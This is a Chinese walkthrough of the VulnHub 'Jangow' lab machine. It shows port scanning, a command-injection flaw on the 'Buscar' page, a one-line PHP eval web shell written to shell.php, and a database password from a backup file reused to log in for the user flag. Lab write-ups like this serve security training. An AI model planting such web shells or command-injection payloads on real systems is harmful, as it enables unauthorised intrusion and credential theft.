VulnHub JANGOW

提示(主机ip分配问题)

因为直接在VulnHub上下载的盒子,在VMware上打开,默认是不分配主机的

所以我们可以在VirtualBox上打开

一、信息收集

发现开放了21和80端口,查看一下80端口

80端口:

检查页面后发现Buscar页面有个可疑的地方:

试下,有命令执行

直接写入一句话木马试一下:

echo '<?php eval($_POST["sain"]);' > shell.php

利用命令执行,看到有shell.php,说明上传成功

连接成功。简单查看一下文件,在/var/www/html/site/wordpress下也发现了配置文件:

除此之外发现在/var/www/html下有一个./backup文件:

发现都是数据库的用户名和密码,但是jangow01和系统名字一样,所以我就尝试下直接登录系统,发现可以直接登陆进去:

username = "jangow01"password = "abygurl69"

拿到了user_flag

相关推荐
行云流水剑8 分钟前
【学习记录】如何使用 Python 提取 PDF 文件中的内容
python·学习·pdf
心扬1 小时前
python生成器
开发语言·python
mouseliu1 小时前
python之二:docker部署项目
前端·python
狂小虎1 小时前
亲测解决self.transform is not exist
python·深度学习
Python智慧行囊1 小时前
Python 中 Django 中间件:原理、方法与实战应用
python·中间件·架构·django·开发
深科文库1 小时前
构建 MCP 服务器:第 3 部分 — 添加提示
服务器·python·chatgpt·langchain·prompt·aigc·agi
yzx9910132 小时前
Linux 系统中的算法技巧与性能优化
linux·算法·性能优化
fengyehongWorld2 小时前
Linux Docker的简介
linux·docker
蓝婷儿2 小时前
6个月Python学习计划 Day 17 - 继承、多态与魔术方法
开发语言·python·学习